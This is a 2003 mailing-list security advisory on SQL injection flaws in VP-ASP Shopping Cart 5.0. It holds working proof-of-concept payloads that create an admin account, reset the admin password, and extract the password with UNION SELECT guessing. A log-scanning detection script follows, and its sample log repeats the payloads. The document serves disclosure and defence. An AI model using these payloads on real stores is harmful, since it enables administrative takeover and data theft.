[Full-Disclosure] Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection Vulnerabilities

From: S-Quadra Security Research (research_at_s-quadra.com)
Date: 12/01/03

    To: full-disclosure <full-disclosure@lists.netsys.com>, bugtraq <bugtraq@securityfocus.com>
    Date: Mon, 01 Dec 2003 16:15:53 +0300
    
    

            S-Quadra Advisory #2003-11-28

    Topic: Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection Vulnerabilities
    Severity: Average
    Vendor URL: http://www.vpasp.com
    Advisory URL: http://www.s-quadra.com/advisories/Adv-20031128.txt
    Release date: 28 Nov 2003

     1. DESCRIPTION

    Virtual Programming VP-ASP is a shopping cart application for e-commerce sites.
    It is written in ASP and supports the following databases: Access, MSSQL and
    MYSQL on Windows, and MYSQL on Unix.

    VP-ASP suffers from SQL injection vulnerabilities which, in some cases, may allow
    an attacker to gain administrative access to the installed VP-ASP Shopping Cart
    software or to execute arbitrary commands on the target system.

     2. DETAILS

     -- Vulnerability 1: SQL Injection vulnerability in 'shopsearch.asp' script

    An SQL Injection vulnerability has been found in the shopsearch.asp script.
    User-supplied input is not filtered before being used in an SQL query;
    consequently, the query can be modified using malformed input. Exploitation of
    the vulnerability allows a remote attacker to insert a new user with
    administrative privileges. A more sophisticated exploitation would allow a
    remote attacker to execute arbitrary commands on the target system (via the
    MSSQL xp_cmdshell() function, for example).

     -- PoC code 1:

     Platform: Win32/MSSQL

    Posting the following data to shopsearch.asp creates a new administrative account:

    Keyword=&category=5); insert into tbluser (fldusername) values
    ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
    Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
    fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
    Keyword=&category=3); update tbluser set fldaccess='1' where
    fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

    Posting the following data to shopsearch.asp changes the admin password:

    Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
    fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

     -- Vulnerability 2: SQL Injection vulnerability in 'shopdisplayproducts.asp' script

    An SQL Injection vulnerability has been found in the shopdisplayproducts.asp
    script. Exploitation of the vulnerability allows a remote attacker to read any
    information from the database.

     -- PoC code 2:

    Platform: Win32/MSSQL

    http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

    By changing the value at the end of the request
            %20'a%25'--
            %20'b%25'--
            %20'c%25'--
            ...
    and looking through the HTTP responses from the VP-ASP web server, an attacker
    can find the admin password.
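    Both issues above leave a recognisable trace in the web server's request log: a
    `category`/`cat` value that should be a plain number instead carries a closed-off
    statement, a `' union select`, or a trailing `--`. The following detection script is
    an added example, not code from the advisory or from VP-ASP; it assumes IIS W3C-style
    log lines with the field order given in the code, the `/vpasp/` path from the PoC URL,
    and a constructed sample log.

```python
import re
from urllib.parse import unquote_plus

# Scripts named in the advisory and the parameter each one feeds into SQL;
# parameter names come from the PoC requests, the /vpasp/ path is assumed.
WATCHED = {"/vpasp/shopsearch.asp": "category",
           "/vpasp/shopdisplayproducts.asp": "cat"}

# Markers present in the advisory's payloads once URL-decoded: a closing paren
# followed by a new statement, a quote followed by UNION SELECT, or a trailing
# "--" comment that discards the rest of the original query.
INJECTION = re.compile(r"\)\s*;\s*(insert|update|delete|exec)\b"
                       r"|'\s*union\s+select\b|--\s*$", re.IGNORECASE)

def suspicious_value(value):
    """A category id should be numeric or 'All'; flag anything else that carries a marker."""
    v = value.strip()
    if v.isdigit() or v.lower() in ("", "all"):
        return False
    return INJECTION.search(v) is not None

def scan_log(lines):
    """Return (client_ip, script, decoded value) for each flagged W3C log line.
    Assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        ip, stem, query = fields[2], fields[4], fields[5]
        param = WATCHED.get(stem.lower())
        if param is None or query == "-":
            continue
        for part in query.split("&"):
            name, _, value = part.partition("=")
            value = unquote_plus(value)
            if unquote_plus(name) == param and suspicious_value(value):
                hits.append((ip, stem, value))
    return hits

# Constructed sample log: a benign search, the advisory's union query, and a
# statement-stacking payload sent as a GET query string (POST bodies are not
# recorded in standard IIS logs, so those need a WAF or proxy log instead).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2003-11-28 10:00:01 192.0.2.10 GET /vpasp/shopsearch.asp Keyword=shoes&category=5&SubCategory=All 200",
    "2003-11-28 10:00:07 192.0.2.77 GET /vpasp/shopdisplayproducts.asp cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'-- 200",
    "2003-11-28 10:00:09 192.0.2.77 GET /vpasp/shopsearch.asp Keyword=&category=5);%20update%20tbluser%20set%20fldpassword='x'%20where%20fldusername='admin'-- 200",
]
```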

     3. FIX INFORMATION

    S-Quadra alerted the VP-ASP development team to this issue on 28 November 2003.
    Security fixes from the VP-ASP development team are available at
    http://www.vpasp.com/virtprog/info/faq_securityfixes.htm

     4. CREDITS

    Nick Gudov <cipher@s-quadra.com> is responsible for discovering this issue.

     5. ABOUT

    S-Quadra offers services in computer security, penetration testing and
    network assessment, web application security, source code review and
    third-party product vulnerability assessment, forensic support and
    reverse engineering.

    Security is an art and our goal is to bring responsible and high quality
    security service to the IT market, customized to meet the unique needs
    of each individual client.

    S-Quadra (pronounced es quadra) is not an acronym.
    It's unique, creative and innovative - just like the security services
    we bring to our clients.

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
